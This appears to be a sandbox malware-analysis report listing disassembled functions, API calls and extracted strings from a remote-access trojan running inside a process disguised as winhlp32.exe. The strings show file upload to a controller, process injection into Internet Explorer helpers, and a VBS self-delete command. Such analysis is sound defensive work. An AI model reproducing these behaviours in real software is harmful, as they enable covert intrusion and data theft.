                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: C:\Windows\winhlp32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                    • API String ID: 1646373207-2557295206
                                    • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                    • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                    • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                    • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • lstrlenW.KERNEL32(?), ref: 0041C036
                                    • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                    • lstrlenW.KERNEL32(?), ref: 0041C067
                                    • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                    • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                    • _wcslen.LIBCMT ref: 0041C13B
                                    • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                    • GetLastError.KERNEL32 ref: 0041C173
                                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                    • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                    • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                    • GetLastError.KERNEL32 ref: 0041C1D0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                    • String ID: ?
                                    • API String ID: 3941738427-1684325040
                                    • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                    • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                    • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                    • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$EnvironmentVariable$_wcschr
                                    • String ID:
                                    • API String ID: 3899193279-0
                                    • Opcode ID: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                                    • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                    • Opcode Fuzzy Hash: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                                    • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                    • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                    • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                    • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                    • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                    • Sleep.KERNEL32(00000064), ref: 00412E94
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                    • String ID: /stext "$0TG$0TG$NG$NG
                                    • API String ID: 1223786279-2576077980
                                    • Opcode ID: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                                    • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                    • Opcode Fuzzy Hash: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                                    • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                    • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnumOpen
                                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                    • API String ID: 1332880857-3714951968
                                    • Opcode ID: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                                    • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                    • Opcode Fuzzy Hash: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                                    • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                    • GetCursorPos.USER32(?), ref: 0041D5E9
                                    • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                    • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                    • ExitProcess.KERNEL32 ref: 0041D665
                                    • CreatePopupMenu.USER32 ref: 0041D66B
                                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                    • String ID: Close
                                    • API String ID: 1657328048-3535843008
                                    • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                    • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                    • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                    • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                    • __aulldiv.LIBCMT ref: 00408D4D
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                    • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                    • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                    • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                    • API String ID: 3086580692-2582957567
                                    • Opcode ID: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                                    • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                    • Opcode Fuzzy Hash: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                                    • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNEL32(00001388), ref: 0040A740
                                      • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                      • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                      • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                      • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                    • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                    • API String ID: 3795512280-1152054767
                                    • Opcode ID: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
                                    • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                    • Opcode Fuzzy Hash: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
                                    • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • connect.WS2_32(?,?,?), ref: 004048E0
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                    • WSAGetLastError.WS2_32 ref: 00404A21
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                    • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                    • API String ID: 994465650-3229884001
                                    • Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                                    • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                    • Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                                    • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 0045130A
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                    • _free.LIBCMT ref: 004512FF
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00451321
                                    • _free.LIBCMT ref: 00451336
                                    • _free.LIBCMT ref: 00451341
                                    • _free.LIBCMT ref: 00451363
                                    • _free.LIBCMT ref: 00451376
                                    • _free.LIBCMT ref: 00451384
                                    • _free.LIBCMT ref: 0045138F
                                    • _free.LIBCMT ref: 004513C7
                                    • _free.LIBCMT ref: 004513CE
                                    • _free.LIBCMT ref: 004513EB
                                    • _free.LIBCMT ref: 00451403
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                    • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                    • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                    • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                      • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                      • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                      • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                    • ExitProcess.KERNEL32 ref: 0040D9C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                    • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                    • API String ID: 1913171305-3159800282
                                    • Opcode ID: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                                    • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                    • Opcode Fuzzy Hash: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                                    • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                                    • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                    • Opcode Fuzzy Hash: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                                    • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                    • GetLastError.KERNEL32 ref: 00455CEF
                                    • __dosmaperr.LIBCMT ref: 00455CF6
                                    • GetFileType.KERNEL32(00000000), ref: 00455D02
                                    • GetLastError.KERNEL32 ref: 00455D0C
                                    • __dosmaperr.LIBCMT ref: 00455D15
                                    • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                    • CloseHandle.KERNEL32(?), ref: 00455E7F
                                    • GetLastError.KERNEL32 ref: 00455EB1
                                    • __dosmaperr.LIBCMT ref: 00455EB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    • API String ID: 4237864984-2852464175
                                    • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                    • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                    • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                    • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
                                    • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
                                    • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                    • __freea.LIBCMT ref: 0044AE30
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    • __freea.LIBCMT ref: 0044AE39
                                    • __freea.LIBCMT ref: 0044AE5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                    • String ID: $C$PkGNG
                                    • API String ID: 3864826663-3740547665
                                    • Opcode ID: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                                    • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                    • Opcode Fuzzy Hash: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                                    • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                    • API String ID: 3756808967-1743721670
                                    • Opcode ID: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                                    • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                    • Opcode Fuzzy Hash: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                                    • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0$1$2$3$4$5$6$7$VG
                                    • API String ID: 0-1861860590
                                    • Opcode ID: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                                    • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                    • Opcode Fuzzy Hash: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                                    • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID: \&G$\&G$`&G
                                    • API String ID: 269201875-253610517
                                    • Opcode ID: 753e5f9e072138fb6cd7009167dc0b4a762ab6b47e26c8bd7c62549e421885b3
                                    • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                    • Opcode Fuzzy Hash: 753e5f9e072138fb6cd7009167dc0b4a762ab6b47e26c8bd7c62549e421885b3
                                    • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 65535$udp
                                    • API String ID: 0-1267037602
                                    • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                    • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                    • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                    • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                    • API String ID: 82841172-425784914
                                    • Opcode ID: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                                    • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                    • Opcode Fuzzy Hash: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
